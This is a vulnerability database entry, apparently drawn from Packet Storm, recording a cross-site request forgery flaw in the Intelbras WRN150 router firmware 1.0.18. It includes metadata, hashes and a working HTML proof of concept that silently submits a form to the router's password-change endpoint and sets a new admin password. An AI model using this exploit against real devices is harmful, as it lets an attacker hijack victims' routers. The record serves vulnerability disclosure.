ID

VAR-E-201910-0007


TITLE

Intelbras Router WRN150 1.0.18 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 154976

DESCRIPTION

Intelbras Router WRN150 version 1.0.18 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 154976

AFFECTED PRODUCTS

vendor:intelbrasmodel:router wrn150scope:eqversion:1.0.18

Trust: 0.5

sources: PACKETSTORM: 154976

EXPLOIT

Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A

####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be

<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/>
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Trust: 0.5

sources: PACKETSTORM: 154976

EXPLOIT HASH

LOCAL

SOURCE

md5: 2a5c4c0eaebca5ec2517e60d7b939fe8
sha-1: 281644008cbb70123c9644e12ff9fdf8db76047c
sha-256: ef7c930d6c05d382986bea588e3f4b50bf4fd0628135a875fbd8fe63e70686cd
md5: 2a5c4c0eaebca5ec2517e60d7b939fe8

Trust: 0.5

sources: PACKETSTORM: 154976

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 154976

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 154976

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 154976

CREDITS

Prof. Joas Antonio

Trust: 0.5

sources: PACKETSTORM: 154976

EXTERNAL IDS

db:PACKETSTORMid:154976

Trust: 0.5

sources: PACKETSTORM: 154976

SOURCES

db:PACKETSTORMid:154976

LAST UPDATE DATE

2022-07-27T09:18:11.072000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:154976date:2019-10-28T20:15:51